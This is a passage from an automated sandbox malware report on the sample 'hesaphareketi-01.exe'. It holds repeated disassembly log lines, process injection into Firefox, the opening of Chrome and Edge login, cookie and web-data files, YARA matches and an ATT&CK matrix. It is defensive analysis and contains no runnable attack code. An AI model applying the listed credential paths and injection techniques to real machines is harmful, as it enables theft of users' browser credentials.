        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A51C0 mov eax, dword ptr fs:[00000030h]19_2_037A51C0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C31BE mov eax, dword ptr fs:[00000030h]19_2_037C31BE
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C31BE mov eax, dword ptr fs:[00000030h]19_2_037C31BE
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C41BB mov ecx, dword ptr fs:[00000030h]19_2_037C41BB
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C41BB mov eax, dword ptr fs:[00000030h]19_2_037C41BB
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C41BB mov eax, dword ptr fs:[00000030h]19_2_037C41BB
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0382314A mov eax, dword ptr fs:[00000030h]19_2_0382314A
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0382314A mov eax, dword ptr fs:[00000030h]19_2_0382314A
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0382314A mov eax, dword ptr fs:[00000030h]19_2_0382314A
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0382314A mov eax, dword ptr fs:[00000030h]19_2_0382314A
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03865149 mov eax, dword ptr fs:[00000030h]19_2_03865149
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03863157 mov eax, dword ptr fs:[00000030h]19_2_03863157
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03863157 mov eax, dword ptr fs:[00000030h]19_2_03863157
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03863157 mov eax, dword ptr fs:[00000030h]19_2_03863157
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D1190 mov eax, dword ptr fs:[00000030h]19_2_037D1190
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D1190 mov eax, dword ptr fs:[00000030h]19_2_037D1190
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B9194 mov eax, dword ptr fs:[00000030h]19_2_037B9194
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03794180 mov eax, dword ptr fs:[00000030h]19_2_03794180
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03794180 mov eax, dword ptr fs:[00000030h]19_2_03794180
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03794180 mov eax, dword ptr fs:[00000030h]19_2_03794180
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03864080 mov eax, dword ptr fs:[00000030h]19_2_03864080
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03864080 mov eax, dword ptr fs:[00000030h]19_2_03864080
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03864080 mov eax, dword ptr fs:[00000030h]19_2_03864080
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03864080 mov eax, dword ptr fs:[00000030h]19_2_03864080
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03864080 mov eax, dword ptr fs:[00000030h]19_2_03864080
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03864080 mov eax, dword ptr fs:[00000030h]19_2_03864080
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03864080 mov eax, dword ptr fs:[00000030h]19_2_03864080
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03797072 mov eax, dword ptr fs:[00000030h]19_2_03797072
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03796074 mov eax, dword ptr fs:[00000030h]19_2_03796074
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03796074 mov eax, dword ptr fs:[00000030h]19_2_03796074
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383F0A5 mov eax, dword ptr fs:[00000030h]19_2_0383F0A5
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383F0A5 mov eax, dword ptr fs:[00000030h]19_2_0383F0A5
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383F0A5 mov eax, dword ptr fs:[00000030h]19_2_0383F0A5
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383F0A5 mov eax, dword ptr fs:[00000030h]19_2_0383F0A5
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383F0A5 mov eax, dword ptr fs:[00000030h]19_2_0383F0A5
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383F0A5 mov eax, dword ptr fs:[00000030h]19_2_0383F0A5
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383F0A5 mov eax, dword ptr fs:[00000030h]19_2_0383F0A5
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03791051 mov eax, dword ptr fs:[00000030h]19_2_03791051
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03791051 mov eax, dword ptr fs:[00000030h]19_2_03791051
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0384B0AF mov eax, dword ptr fs:[00000030h]19_2_0384B0AF
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_038650B7 mov eax, dword ptr fs:[00000030h]19_2_038650B7
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378D02D mov eax, dword ptr fs:[00000030h]19_2_0378D02D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03798009 mov eax, dword ptr fs:[00000030h]19_2_03798009
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B5004 mov eax, dword ptr fs:[00000030h]19_2_037B5004
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B5004 mov ecx, dword ptr fs:[00000030h]19_2_037B5004
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037890F8 mov eax, dword ptr fs:[00000030h]19_2_037890F8
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037890F8 mov eax, dword ptr fs:[00000030h]19_2_037890F8
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037890F8 mov eax, dword ptr fs:[00000030h]19_2_037890F8
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037890F8 mov eax, dword ptr fs:[00000030h]19_2_037890F8
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037CD0F0 mov eax, dword ptr fs:[00000030h]19_2_037CD0F0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037CD0F0 mov ecx, dword ptr fs:[00000030h]19_2_037CD0F0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378C0F6 mov eax, dword ptr fs:[00000030h]19_2_0378C0F6
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037AB0D0 mov eax, dword ptr fs:[00000030h]19_2_037AB0D0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378B0D6 mov eax, dword ptr fs:[00000030h]19_2_0378B0D6
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378B0D6 mov eax, dword ptr fs:[00000030h]19_2_0378B0D6
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378B0D6 mov eax, dword ptr fs:[00000030h]19_2_0378B0D6
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378B0D6 mov eax, dword ptr fs:[00000030h]19_2_0378B0D6
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D00A5 mov eax, dword ptr fs:[00000030h]19_2_037D00A5
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0386505B mov eax, dword ptr fs:[00000030h]19_2_0386505B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03839060 mov eax, dword ptr fs:[00000030h]19_2_03839060
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378C090 mov eax, dword ptr fs:[00000030h]19_2_0378C090
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378A093 mov ecx, dword ptr fs:[00000030h]19_2_0378A093
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03794779 mov eax, dword ptr fs:[00000030h]19_2_03794779
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03794779 mov eax, dword ptr fs:[00000030h]19_2_03794779
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0386B781 mov eax, dword ptr fs:[00000030h]19_2_0386B781
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0386B781 mov eax, dword ptr fs:[00000030h]19_2_0386B781
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A2760 mov ecx, dword ptr fs:[00000030h]19_2_037A2760
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0380E79D mov eax, dword ptr fs:[00000030h]19_2_0380E79D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0380E79D mov eax, dword ptr fs:[00000030h]19_2_0380E79D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0380E79D mov eax, dword ptr fs:[00000030h]19_2_0380E79D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0380E79D mov eax, dword ptr fs:[00000030h]19_2_0380E79D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0380E79D mov eax, dword ptr fs:[00000030h]19_2_0380E79D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0380E79D mov eax, dword ptr fs:[00000030h]19_2_0380E79D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0380E79D mov eax, dword ptr fs:[00000030h]19_2_0380E79D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0380E79D mov eax, dword ptr fs:[00000030h]19_2_0380E79D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0380E79D mov eax, dword ptr fs:[00000030h]19_2_0380E79D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D1763 mov eax, dword ptr fs:[00000030h]19_2_037D1763
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D1763 mov eax, dword ptr fs:[00000030h]19_2_037D1763
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D1763 mov eax, dword ptr fs:[00000030h]19_2_037D1763
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D1763 mov eax, dword ptr fs:[00000030h]19_2_037D1763
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D1763 mov eax, dword ptr fs:[00000030h]19_2_037D1763
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D1763 mov eax, dword ptr fs:[00000030h]19_2_037D1763
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385D7A7 mov eax, dword ptr fs:[00000030h]19_2_0385D7A7
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385D7A7 mov eax, dword ptr fs:[00000030h]19_2_0385D7A7
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385D7A7 mov eax, dword ptr fs:[00000030h]19_2_0385D7A7
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F75B mov eax, dword ptr fs:[00000030h]19_2_0378F75B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F75B mov eax, dword ptr fs:[00000030h]19_2_0378F75B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F75B mov eax, dword ptr fs:[00000030h]19_2_0378F75B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F75B mov eax, dword ptr fs:[00000030h]19_2_0378F75B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F75B mov eax, dword ptr fs:[00000030h]19_2_0378F75B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F75B mov eax, dword ptr fs:[00000030h]19_2_0378F75B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F75B mov eax, dword ptr fs:[00000030h]19_2_0378F75B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F75B mov eax, dword ptr fs:[00000030h]19_2_0378F75B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F75B mov eax, dword ptr fs:[00000030h]19_2_0378F75B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037CA750 mov eax, dword ptr fs:[00000030h]19_2_037CA750
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B2755 mov eax, dword ptr fs:[00000030h]19_2_037B2755
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B2755 mov eax, dword ptr fs:[00000030h]19_2_037B2755
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B2755 mov eax, dword ptr fs:[00000030h]19_2_037B2755
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B2755 mov ecx, dword ptr fs:[00000030h]19_2_037B2755
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B2755 mov eax, dword ptr fs:[00000030h]19_2_037B2755
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B2755 mov eax, dword ptr fs:[00000030h]19_2_037B2755
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C174A mov eax, dword ptr fs:[00000030h]19_2_037C174A
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_038617BC mov eax, dword ptr fs:[00000030h]19_2_038617BC
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C3740 mov eax, dword ptr fs:[00000030h]19_2_037C3740
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0384F7CF mov eax, dword ptr fs:[00000030h]19_2_0384F7CF
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B9723 mov eax, dword ptr fs:[00000030h]19_2_037B9723
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379471B mov eax, dword ptr fs:[00000030h]19_2_0379471B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379471B mov eax, dword ptr fs:[00000030h]19_2_0379471B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B270D mov eax, dword ptr fs:[00000030h]19_2_037B270D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B270D mov eax, dword ptr fs:[00000030h]19_2_037B270D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B270D mov eax, dword ptr fs:[00000030h]19_2_037B270D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379D700 mov ecx, dword ptr fs:[00000030h]19_2_0379D700
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378B705 mov eax, dword ptr fs:[00000030h]19_2_0378B705
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378B705 mov eax, dword ptr fs:[00000030h]19_2_0378B705
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378B705 mov eax, dword ptr fs:[00000030h]19_2_0378B705
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378B705 mov eax, dword ptr fs:[00000030h]19_2_0378B705
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037977F9 mov eax, dword ptr fs:[00000030h]19_2_037977F9
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037977F9 mov eax, dword ptr fs:[00000030h]19_2_037977F9
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385970B mov eax, dword ptr fs:[00000030h]19_2_0385970B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385970B mov eax, dword ptr fs:[00000030h]19_2_0385970B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0384F717 mov eax, dword ptr fs:[00000030h]19_2_0384F717
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037937E4 mov eax, dword ptr fs:[00000030h]19_2_037937E4
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037937E4 mov eax, dword ptr fs:[00000030h]19_2_037937E4
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037937E4 mov eax, dword ptr fs:[00000030h]19_2_037937E4
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037937E4 mov eax, dword ptr fs:[00000030h]19_2_037937E4
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037937E4 mov eax, dword ptr fs:[00000030h]19_2_037937E4
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037937E4 mov eax, dword ptr fs:[00000030h]19_2_037937E4
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037937E4 mov eax, dword ptr fs:[00000030h]19_2_037937E4
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383E750 mov eax, dword ptr fs:[00000030h]19_2_0383E750
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037907A7 mov eax, dword ptr fs:[00000030h]19_2_037907A7
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C1796 mov eax, dword ptr fs:[00000030h]19_2_037C1796
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C1796 mov eax, dword ptr fs:[00000030h]19_2_037C1796
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0384F68C mov eax, dword ptr fs:[00000030h]19_2_0384F68C
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03790670 mov eax, dword ptr fs:[00000030h]19_2_03790670
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2670 mov eax, dword ptr fs:[00000030h]19_2_037D2670

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF73BDD0000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe; Section loaded: unknown target: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe; Section loaded: unknown target: C:\Windows\SysWOW64\SearchProtocolHost.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Section loaded: unknown target: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe protection: read write
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Section loaded: unknown target: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF73BDD0000
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe; Process created: C:\Users\user\Desktop\hesaphareketi-01.exe C:\Users\user\Desktop\hesaphareketi-01.exe
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe; Process created: C:\Windows\SysWOW64\SearchProtocolHost.exe C:\Windows\SysWOW64\SearchProtocolHost.exe
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe; Code function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess

        Stealing of Sensitive Information

        Source: Yara match; File source: 00000013.00000002.5795631450.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000013.00000002.5795764214.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 0000000C.00000002.5796633331.0000000002B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

        Remote Access Functionality

        Source: Yara match; File source: 00000013.00000002.5795631450.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000013.00000002.5795764214.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 0000000C.00000002.5796633331.0000000002B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
        Valid Accounts1
        Native API
        1
        DLL Side-Loading
        1
        Access Token Manipulation
        11
        Masquerading
        1
        OS Credential Dumping
        2
        Security Software Discovery
        Remote Services1
        Email Collection
        Exfiltration Over Other Network Medium11
        Encrypted Channel
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
        System Shutdown/Reboot
        Acquire InfrastructureGather Victim Identity Information
        Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts311
        Process Injection
        2
        Virtualization/Sandbox Evasion
        LSASS Memory2
        Virtualization/Sandbox Evasion
        Remote Desktop Protocol1
        Archive Collected Data
        Exfiltration Over Bluetooth4
        Ingress Tool Transfer
        SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
        Domain AccountsAtLogon Script (Windows)1
        DLL Side-Loading
        1
        Access Token Manipulation
        Security Account Manager1
        Process Discovery
        SMB/Windows Admin Shares1
        Data from Local System
        Automated Exfiltration4
        Non-Application Layer Protocol
        Data Encrypted for ImpactDNS ServerEmail Addresses
        Local AccountsCronLogin HookLogin Hook311
        Process Injection
        NTDS1
        Application Window Discovery
        Distributed Component Object Model1
        Clipboard Data
        Traffic Duplication5
        Application Layer Protocol
        Data DestructionVirtual Private ServerEmployee Names
        Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information
        LSA Secrets2
        File and Directory Discovery
        SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
        Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
        Obfuscated Files or Information
        Cached Domain Credentials4
        System Information Discovery
        VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
        External Remote ServicesSystemd TimersStartup ItemsStartup Items1
        DLL Side-Loading
        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
        [Behavior graph] ID: 1353023, Sample: hesaphareketi-01.exe, Start date: 04/12/2023, Architecture: WINDOWS, Score: 100
        Source | Detection | Scanner | Label
        hesaphareketi-01.exe | 18% | Virustotal |
        hesaphareketi-01.exe | 6% | ReversingLabs |

        Source | Detection | Scanner | Label
        C:\Users\user\AppData\Local\Temp\nsj313A.tmp\LangDLL.dll | 0% | ReversingLabs |
        C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll | 0% | ReversingLabs |

        No Antivirus matches
Joe Sandbox version: 38.0.0 Ammolite
Analysis ID: 1353023
Start date and time: 2023-12-04 11:58:36 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 20m 1s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: hesaphareketi-01.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/11@19/17
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 89%
• Number of executed functions: 105
• Number of non-executed functions: 246
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, login.live.com, tse1.mm.bing.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, g.bing.com, nexusrules.officeapps.live.com, arc.msn.com
• Execution Graph export aborted for target hesaphareketi-01.exe, PID 1380 because there are no executed function
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Time | Type | Description
12:03:59 | API Interceptor | 40282184x Sleep call for process: SearchProtocolHost.exe modified
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
